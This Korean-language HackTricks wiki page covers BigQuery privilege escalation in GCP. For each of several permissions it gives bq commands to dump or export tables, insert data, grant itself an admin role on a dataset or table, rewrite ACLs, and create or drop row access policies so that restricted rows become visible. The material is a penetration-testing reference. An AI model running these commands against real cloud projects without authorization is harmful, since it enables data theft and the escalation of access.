GCP - BigQuery Privesc

Reading time: 4 minutes

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

BigQuery

BigQuery에 대한 자세한 정보는 다음을 확인하세요:

GCP - Bigquery Enum

Read Table

BigQuery 테이블에 저장된 정보를 읽으면 sensitive information을 찾을 수 있습니다. 정보를 액세스하려면 필요한 권한은 bigquery.tables.get, bigquery.jobs.create 및 **bigquery.tables.getData**입니다:

bash
bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

데이터 내보내기

이것은 데이터에 접근하는 또 다른 방법입니다. 클라우드 스토리지 버킷에 내보내고 정보가 담긴 파일을 다운로드합니다.
이 작업을 수행하려면 다음 권한이 필요합니다: bigquery.tables.export, bigquery.jobs.createstorage.objects.create.

bash
bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

데이터 삽입

신뢰할 수 있는 특정 데이터를 Bigquery 테이블에 다른 곳의 취약점을 악용하기 위해 삽입하는 것이 가능할 수 있습니다. 이는 bigquery.tables.get, bigquery.tables.updateDatabigquery.jobs.create 권한을 사용하여 쉽게 수행할 수 있습니다:

bash
# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

bigquery.datasets.setIamPolicy

공격자는 이 권한을 악용하여 BigQuery 데이터셋에 대한 추가 권한을 부여할 수 있습니다:

bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

이 권한만으로도 ACL을 수정하여 BigQuery 데이터셋에 대한 액세스를 업데이트할 수 있습니다.

bash
# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>

bigquery.tables.setIamPolicy

공격자는 이 권한을 악용하여 BigQuery 테이블에 대한 추가 권한을 부여할 수 있습니다:

bash
# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

문서에 따르면, 언급된 권한으로 행 정책을 업데이트할 수 있습니다.
하지만, CLI bq를 사용하려면 추가로 bigquery.rowAccessPolicies.create, **bigquery.tables.get**이 필요합니다.

bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

행 정책 열거의 출력에서 필터 ID를 찾는 것이 가능합니다. 예:

bash
bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09

bigquery.rowAccessPolicies.delete 대신 bigquery.rowAccessPolicies.update가 있다면 정책을 삭제할 수도 있습니다:

bash
# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

caution

행 액세스 정책을 우회할 수 있는 또 다른 잠재적 옵션은 제한된 데이터의 값을 변경하는 것입니다. termCfba일 때만 볼 수 있다면, 테이블의 모든 레코드를 term = "Cfba"로 수정하십시오. 그러나 이는 bigquery에 의해 방지됩니다.

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기